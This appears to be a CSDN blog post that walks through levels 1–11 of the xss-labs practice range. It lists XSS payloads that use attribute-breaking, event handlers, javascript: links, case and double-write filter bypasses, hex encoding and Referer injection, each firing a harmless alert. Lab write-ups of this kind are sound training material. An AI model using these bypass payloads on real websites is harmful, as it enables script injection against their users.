xss-labs靶场通关总结(上)

已于 2022-08-15 10:36:30 修改
阅读量317 收藏
点赞数
分类专栏: 靶场练习 文章标签: xss 前端 网络安全 web安全 安全
于 2022-08-07 23:44:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/126217046
版权
本文详细介绍了JavaScript注入的各种方法及其防御策略,包括利用GET请求注入、闭合技巧、编码绕过、伪协议利用、事件属性及特殊字符绕过等。通过实例展示了如何测试和规避WAF过滤,涉及前端安全的重要知识点。
摘要由CSDN通过智能技术生成

目录

1.less-1

2.less-2

3.less-3 

4.less-4

5.less-5

6.less-6

7.less-7

8.less-8

9.less-9

10.less-10

11.less-11

有需要的小伙伴可以联系我!先关闭WAF

1.less-1

为GET类型的请求,可以直接在URL进行注入JS脚本

2.less-2

当输入jinyouxin时,查看源码

 和sql注入确定是数字型或是字符型类似,可以使用闭合的方式

"> <script>alert("jinyouxin")</script>

3.less-3 

 当输入<script>alert("jinyouxin")</script>时,发现< > 被编码,故可以使用onmouseover进行绕过

 'οnmοuseοver='alert(/jinyouxin/)

4.less-4

先尝试是哪种方式防御,<script>alert("jinyouxin")</script>时

 <和>被过滤到了,故同上 ”οnmοuseοver='alert(/jinyouxin/)

5.less-5

由上面思路已经知道<sCcrippt ' "on>都是敏感信息

 可知on被kill,使用伪协议:“javascript:”、“php://”、“edk2://”

"><a href = "javascript:alert:alert(/jinyouxin/)">click</a>

6.less-6

 同上次方法

 可知href也做了处理,试一试大小写hREf,过了(试了n次其他方法)

7.less-7

 on过滤掉了,在试试script也被过滤了,试试双写

"><scscriptript>alert("flag")</scripscriptt>

"Oοnmοuseοver="alert(/flag/)

8.less-8

 单引号没有处理!!!先试试伪协议:javascript:alert(/flag/)

 试试s的十六进制编码,java&#x73;cript:alert(/flag/)  (其他字母也可也)过了

9.less-9

 换成合法http://www.baidu.com试试,过了

10.less-10

输入 <sCcrippt ' "on>,value为空,但是name是提示信息,一个个试

有反应不过<和>什么了,添加弹窗button 

click" type="button" οnclick="alert(/flag/)

11.less-11

Burp suite抓包试试 ,有referer,试试t_ref

Referer: " type="text" οnclick="alert('flag')

@Camelus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XXE漏洞复现(基于xxe-lab靶场
weixin_73180072的博客
09-20 489
phpstudywindow10靶场源文件下载完毕后解压放置在phpstudy/www/目录下即可,访问(我这里解压后改了下文件夹名为xxe-lab,所以访问地址变了)
xss-labs靶场总结(持续更新)
<XiaoHai>的博客
06-17 280
web安全
XEE漏洞学习(史上最详细 包括Linux配置漏洞环境)
qq_34598847的博客
10-13 817
XXE漏洞全称XML External Entity Injection 即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害
xxe-lab靶场安装和简单php代码审计
永远是少年
12-23 3047
今天继续给大家介绍渗透测试相关知识,本文主要内容是xxe-lab靶场安装和简单php代码审计。 一、xxe-lab靶场简介 二、php xxe-lab靶场安装 三、xxe-lab靶场PHP代码审计
vulhub靶场学习日记xxe-lab
m0_55763479的博客
07-27 1109
vulhub靶场学习日记xxe-lab,主要练习XEE漏洞!
DTD学习一(入门)
Joy的专栏
04-04 577
一 简介 文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 二、实例 1、如果一个DTD被包含在XML源文件中,如使用如下test.xml: 文档定义语法: 元素定义语法: 2、如果是一个XML文件引用一个外部的DTD文件,如下实例: te
xss-labs靶场通关
最新发布
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
**XSS-Labs靶场详解** XSS-Labs是一个针对跨站脚本(Cross-Site Scripting,简称XSS安全漏洞的专业靶场。这个靶场设计了一系列的挑战关卡,旨在帮助用户深入理解XSS攻击的原理、类型以及防御策略。通过实战演练,...
xss-labs-master.rar
05-09
总结,"xss-labs-master.rar" 是一个宝贵的XSS学习资源,它不仅涵盖了XSS的基础理论,还提供了实战经验,对于想要深入理解和防范XSS攻击的人来说,是一次难得的训练机会。通过系统地完成这二十个关卡,你将能够更好...
边打XXE-lab边学习(一)
negnegil的博客
06-19 4906
一、简介及靶场搭建 简介 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 XXE原理 XXE即XML外部实体注入 。我们先分别理解一下注入和外部实体的含义。 注入:是指XML数据在传输过程中被修改,导致服务器执行了修改后的恶意代码,从而达到攻击目的。 外部实体:则是指攻击者通过利用外部实体声明部分来对XML数据进行修改、插入恶意代码。 所以XXE就是指XML数据在传输过程中利用外部实体声明部分的“SYSTEM
xxe-lab学习
win176489的博客
03-03 869
xxe-lab学习 xxe:xml外部实体注入,程序在解析xml文件时,引用了不安全的外部实体 环境如下 首先时回显的xxe,测试数据如下 POST /php_xxe/doLogin.php HTTP/1.1 Host: 10.10.6.168 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: application/xml, text/xml, */*; q=0.01 Acc
XXE与XXE-Lab
情感博主V
02-24 1591
简介 1. XXE Injection(XML External Entity Injection)XML外部实体注入 服务端接收和解析了来自用户端的XML数据,而又没有做严格的安全控制,从而导致XML外部实体注入。 2. XML(Extensible Markup Language)可扩展标记语言 XML用来传输和存储数据; XML的标签没有预定义,需要自行定义标签; XML文档结构包括:XML...
XXE漏洞及Blind XXE练习
Shinpachi8的博客
12-04 4311
XXE漏洞及Blind XXE实例。 详细说明。
XXE Lab:1题解
weixin_34314962的博客
11-07 777
思路 题目已经提示是XXE的专项练习,所以,直接找XXE问题. 难度 入门 端口扫描 nmap -sS -A 10.129.10.64 发现HTTP服务、Apache 2.4.27中间件、robots.txt泄漏了目录和文件 80端口检查 其中,/xxe/index.php页面通过xml格式提交用户名和密码,于是,此处即为XXE所在位置。构造如下payload,读取页面源码,获得一不知是flag还...
xxe漏洞学习
L1ni01
11-06 186
xxe漏洞学习 一.XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD元素 DTD属性 以下是 属性类型的选项: 我们XXE 利用的是 它的实体属性 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。 内部声明DTD <!DOCTYPE 根元素 [元素声明]&gt
初识XXE漏洞
热门推荐
Websec
03-22 1万+
0X01:何为XXE漏洞?XXE是指xml外部实体攻击0x02:那么xml是什么?xml实体攻击是什么?XML百度是这样子的:可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言...
从xxe-lab来深入学习xxe漏洞
aaeoj8957的博客
06-07 736
这几天,想复习一下xxe的知识,于是把以前的一个靶场拿过来玩玩,顺便审计一下代码2333,靶场地址:https://github.com/c0ny1/xxe-lab 首先先练习的是php-xxe: ...
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值